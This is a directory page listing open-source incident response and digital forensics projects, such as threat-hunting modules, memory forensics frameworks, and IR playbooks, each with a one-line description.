Incident Response
Showing 36 of 176 projects
A PowerShell module for threat hunting and detecting malicious activity via Windows Event Logs.
A PowerShell module for Blue Teams, Incident Responders, and System Administrators to hunt persistence techniques implanted in Windows machines.
A Python-based engine for automatic creation of super timelines from computer system logs and files for digital forensic analysis.
An agile cybersecurity incident management platform for tracking, reporting, and responding to security incidents.
An agile cybersecurity incident management platform for tracking, reporting, and responding to security incidents.
An open-source memory forensic framework for extracting and analyzing digital artifacts from Windows, Linux, and OSX memory images.
A forensics intelligence platform that bridges CTI and DFIR by storing threat intelligence and enabling bulk observable searches and threat-focused analysis.
A Loadable Kernel Module (LKM) for acquiring volatile memory from Linux and Android devices, supporting local disk or network output.
A forensic evidence collection and analysis toolkit for macOS, gathering system data to investigate potential infections.
A forensic evidence collection and analysis toolkit for macOS, gathering system data to detect and investigate malware infections.
A high-performance packet capture solution that buffers all network traffic to disk for fast retrieval of specific subsets.
A Python tool that generates YARA rules for malware detection by filtering out strings and opcodes that appear in goodware.
A repository of publicly-available reports and blogs on APT (Advanced Persistent Threat) campaigns, activity, and software, organized by year.
A collection of ready-to-use KQL queries for threat hunting, detection, and analytics in Microsoft Defender for Endpoint and Azure Sentinel.
A modular PowerShell framework for enterprise incident response and breach hunting using remote data collection.
A modular PowerShell framework for enterprise incident response and breach hunting using remote data collection.
A collection of real-world malware samples, analysis exercises, and training resources for cybersecurity education and research.
An open-source repository of security detections, analytic stories, and response playbooks mapped to MITRE ATT&CK for Splunk Enterprise Security.
A web-based collaborative platform for incident responders to share technical details during cybersecurity investigations.
A browser forensics tool for analyzing web artifacts from Google Chrome and other Chromium-based browsers.
A PowerShell framework for live disk forensic analysis, supporting NTFS and FAT file systems.
A threat hunting tool that analyzes Windows event logs to detect APT movements and suspicious activity using pre-defined rules and statistical analysis.
A high-performance digital forensics tool that scans disk images and files to extract structured evidence like emails, credit cards, and encoded data.
A portable, extensible incident response tool that automates forensic artifact collection across Unix-like systems.
An automated phishing email analysis tool that extracts observables, integrates with TheHive/Cortex/MISP, and calculates verdicts.
A pre-configured Linux virtual machine for adversary emulation and threat hunting with attacker and defender toolkits.
A community-sourced, machine-readable knowledge base of digital forensic artifacts for use in forensic tools and investigations.
A collection of practical security-focused guides and checklists for smart contract development.
A command-line forensics tool for tracking USB device connection history on GNU/Linux systems.
A collection of operational incident response cheat sheets covering multiple security incident scenarios for CERT teams.
A security feed collection and processing solution for IT security teams using message queuing protocols.
A digital forensics and incident response framework for unified analysis of forensic artifacts across disk formats, filesystems, and operating systems.
A portable volatile memory acquisition tool for Linux that captures memory images without requiring target OS or kernel knowledge.
A framework of Python scripts for blue teams to test detection capabilities against malicious tradecraft modeled after MITRE ATT&CK.
A desktop application for incident responders to track findings, tasks, and visualize timelines during cybersecurity investigations.
AWS incident response runbook templates for DoS/DDoS attacks, credential leakage, and S3 bucket access incidents.
Related Tags
Found a gem we're missing?
Open-Awesome is built by the community, for the community. Submit a project, suggest an awesome list, or help improve the catalog on GitHub.